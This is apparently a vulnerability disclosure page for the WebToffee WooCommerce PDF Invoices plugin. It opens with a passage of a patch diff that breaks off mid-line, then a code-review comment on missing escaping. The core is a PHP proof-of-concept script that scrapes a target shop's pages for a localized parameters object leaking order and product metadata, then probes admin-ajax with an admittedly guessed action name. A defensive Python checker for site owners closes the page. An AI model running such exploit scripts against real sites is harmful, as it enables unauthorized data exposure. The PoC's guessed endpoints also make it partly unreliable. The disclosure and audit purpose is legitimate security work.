-														$fallback_icon='printer';
+												if ( version_compare( $wp_version, '5.5.3' ) >= 0 ) {
+													$fallback_icon = 'tag';
+													if ( false !== strpos( $action, 'download_' ) ) {
+														$fallback_icon = 'download';
+
+													} elseif ( false !== strpos( $action, 'print_' ) ) {
+														$fallback_icon = 'printer';
 													}
-													$btn_label='<span class="dashicons dashicons-'.$fallback_icon.' '.esc_attr($icon_class).'"></span>';
+													$btn_label = '<span class="dashicons dashicons-' . $fallback_icon . ' ' . esc_attr( $icon_class ) . '"></span>';

-												}else
-												{
-													$fallback_icon_url='tag-icon.png';
-													if(false !== strpos($action, 'download_'))
-													{
-														$fallback_icon_url='download-icon.png';
-
-													}elseif(false !== strpos($action, 'print_'))
-													{
-														$fallback_icon_url='print-icon.png';
+												} else {
+													$fallback_icon_url = 'tag-icon.png';
+													if ( false !== strpos( $action, 'download_' ) ) {
+														$fallback_icon_url = 'download-icon.png';
+
+													} elseif ( false !== strpos( $action, 'print_' ) ) {
+														$fallback_icon_url = 'print-icon.png';
 													}
-													$btn_label='<span class="dashicons" style="line-height:17px;"><img src="'.WF_PKLIST_PLUGIN_URL.'admin/images/'.$fallback_icon_url.'" style="width:16px; height:16px; display:inline;"></span>';
-												}
-											}else
-											{
-												if("" !== $icon)
-												{
-													$btn_label='<span class="dashicons dashicons-'.$icon.' '.esc_attr($icon_class).'"></span>';
-												}else
-												{
-													$btn_label='<span class="dashicons" style="line-height:17px;"><img src="'.esc_url($icon_url).'" style="width:16px; height:16px; display:inline;"></span>';
+													$btn_label = '<span class="dashicons" style="line-height:17px;"><img src="' . WF_PKLIST_PLUGIN_URL . 'admin/images/' . $fallback_icon_url . '" style="width:16px; height:16px; display:inline;"></span>';
 												}
+											} elseif ( '' !== $icon ) {
+													$btn_label = '<span class="dashicons dashicons-' . $icon . ' ' . esc_attr( $icon_class ) . '"></span>';
+											} else {
+												$btn_label = '<span class="dashicons" style="line-height:17px;"><img src="' . esc_url( $icon_url ) . '" style="width:16px; height:16px; display:inline;"></span>';
 											}
-											if(true === $doc_exist){
+											if ( true === $doc_exist ) {
 												$btn_label .= '<span class="dashicons dashicons-saved wt_pklist_doc_exist"></span>';
 											}
-										}else
-										{
-											$btn_label=$label;
+										} else {
+											$btn_label = $label;
 										}

-										$tooltip=(isset($btnvv['tooltip']) ? $btnvv['tooltip'] : $label);
-										$is_show_prompt=$btnvv['is_show_prompt'];
-										$item_css_class=(isset($btnvv['css_class']) && is_string($btnvv['css_class']) ? $btnvv['css_class'] : ''); /* dropdown item custom css */
-										$item_custom_attr=(isset($btnvv['custom_attr']) && is_string($btnvv['custom_attr']) ? $btnvv['custom_attr'] : ''); /* dropdown item custom attribute */
-
-										$url=self::get_print_url($order_id, $action);
-
-										$href_attr='';
-										$onclick='';
-										$confirmation_clss='';
-										$print_node_attr = '';
-										if(0 !== $is_show_prompt) //$is_show_prompt variable is a string then it will set as warning msg title
-										{
-											if(strpos($item_css_class, 'wt_pklist_printnode_manual_print') === false){
-												$confirmation_clss='wf_pklist_confirm_'.$action;
-												$onclick='onclick=" return wf_Confirm_Notice_for_Manually_Creating_Invoicenumbers(''.$url.'',''.$is_show_prompt.'');"';
+										$tooltip          = ( isset( $btnvv['tooltip'] ) ? $btnvv['tooltip'] : $label );
+										$is_show_prompt   = $btnvv['is_show_prompt'];
+										// Only invoice / proforma actions burn a sequence number on auto-draft.
+										if ( self::is_order_unsaved( $order ) && self::action_bu
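Review bot: `create_metabox_content()` now calls `$order->get_id()` unconditionally, but `wc_get_order()` returns `false` when the post or ID does not resolve to an order, which would be a fatal error at that line. Add the same guard this patch introduces in the front-end handlers, `if ( ! is_object( $order ) || ! is_a( $order, 'WC_Order' ) ) { return; }`, before reading the ID. In `generate_print_button_html()` the plain-link branch builds `' href="' . $url . '"'` without `esc_url()`, unlike `generate_print_button_data()`, and `$icon` and `$fallback_icon` are written into the `class` attribute unescaped while `$icon_class` beside them goes through `esc_attr()`; escaping all of them keeps the two button renderers consistent.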

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-49056 - WebToffee WooCommerce PDF Invoices <= 4.9.4 - Unauthenticated Information Exposure

$target_url = 'http://example.com'; // Replace with the target WordPress site URL

// Step 1: Access the admin script URL to extract localized parameters (wf_pklist_params)
$admin_script_url = $target_url . '/wp-content/plugins/print-invoices-packing-slip-labels-for-woocommerce/admin/js/wf-woocommerce-packing-list-admin.js';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_script_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[*] Requesting admin JS: $admin_script_url\n";
echo "[+] HTTP Status: $http_code\n";

if ($http_code == 200) {
    // The JavaScript file itself does not contain the localized data; it is embedded in the HTML page via wp_localize_script.
    // We need to fetch a page where the script is enqueued (e.g., a WooCommerce order page for a logged-in user, but for unauthenticated, try a shop or cart page).
    echo "[*] JS file accessible. Localized data is embedded in the HTML page. Fetching front-end page...\n";
    
    // Step 2: Fetch a front-end page that likely enqueues the plugin's script
    $page_url = $target_url . '/shop/';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $page_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $html = curl_exec($ch);
    curl_close($ch);
    
    // Look for the wp_localize_script output: var wf_pklist_params = {...}
    preg_match('/var wf_pklist_params\s*=\s*({.*?});/s', $html, $matches);
    if (isset($matches[1])) {
        echo "[+] Found wf_pklist_params object:\n";
        echo $matches[1] . "\n\n";
        
        $params = json_decode($matches[1], true);
        if ($params) {
            echo "[+] Decoded parameters:\n";
            print_r($params);
            
            // Check for sensitive fields
            if (isset($params['order_meta_autocomplete'])) {
                echo "\n[!] Order meta autocomplete data exposed:\n";
                print_r(json_decode($params['order_meta_autocomplete'], true));
            }
            if (isset($params['product_meta_autocomplete'])) {
                echo "\n[!] Product meta autocomplete data exposed:\n";
                print_r(json_decode($params['product_meta_autocomplete'], true));
            }
            if (isset($params['wt_plugin_data'])) {
                echo "\n[!] Plugin data exposed:\n";
                print_r($params['wt_plugin_data']);
            }
        }
    } else {
        echo "[-] Could not find wf_pklist_params in the page HTML. The script may not be enqueued on this page.\n";
        echo "[*] Trying to access admin-ajax.php directly with a common action...\n";
        
        // Step 3: Try to call an AJAX action that might leak data without auth
        $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
        $data = array(
            'action' => 'wf_pklist_order_meta_autocomplete', // Hypothetical action name, adjust based on actual plugin
            'term' => 'test'
        );
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $ajax_url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        echo "[+] AJAX response (HTTP $http_code): $response\n";
    }
} else {
    echo "[-] Failed to access admin JS. The plugin might not be installed or path differs.\n";
}

echo "\n[*] Note: This PoC demonstrates unauthenticated access. Actual sensitive data extraction depends on the exact AJAX actions implemented in the plugin.\n";
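For site owners, the same localized object can be checked offline in HTML saved from a logged-out render of their own pages. The following is an added example, not Atomic Edge's or WebToffee's code: it parses the `var wf_pklist_params = {...};` block with a JSON decoder rather than a non-greedy regex, so a `};` inside a string value does not truncate the object. The `ajaxurl` and `example_nonce` keys, the sample values and the "nonce" name heuristic are assumptions constructed for the example.

```python
import json
import re

# Keys the PoC above inspects; matching "nonce" in a key name is an added heuristic.
SENSITIVE_KEYS = ("order_meta_autocomplete", "product_meta_autocomplete", "wt_plugin_data")


def find_localized_object(html, name="wf_pklist_params"):
    """Return the object wp_localize_script printed as `var <name> = {...};`, or None."""
    m = re.search(r"var\s+" + re.escape(name) + r"\s*=\s*", html)
    if not m:
        return None
    try:
        # raw_decode stops at the end of the first JSON value, so a "};"
        # inside a string value cannot cut the object short.
        obj, _end = json.JSONDecoder().raw_decode(html, m.end())
    except json.JSONDecodeError:
        return None
    return obj if isinstance(obj, dict) else None


def audit_page(html):
    """List findings for a page that was rendered without a login cookie."""
    params = find_localized_object(html)
    if params is None:
        return []
    findings = []
    for key, value in params.items():
        if key in SENSITIVE_KEYS and value not in ("", None, [], {}):
            findings.append("exposed:" + key)
        elif "nonce" in key.lower():
            findings.append("nonce:" + key)
    return sorted(findings)


# Constructed sample: an anonymous page render that carries the localized object.
SAMPLE_LEAKY = """<script id="wf-pklist-js-extra">
var wf_pklist_params = {"ajaxurl":"https:\\/\\/shop.example\\/wp-admin\\/admin-ajax.php",
"example_nonce":"0000000000","order_meta_autocomplete":"[\\"_billing_note};\\"]",
"wt_plugin_data":{"path":"PLACEHOLDER"}};
</script>"""
SAMPLE_CLEAN = "<html><body><script>var other = {};</script></body></html>"

if __name__ == "__main__":
    print(audit_page(SAMPLE_LEAKY))
    print(audit_page(SAMPLE_CLEAN))
```

An empty result on every page reachable without a login means the object is not being localized for anonymous visitors; any finding on such a page is a reason to upgrade to 4.9.5 and rotate whatever the object disclosed.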
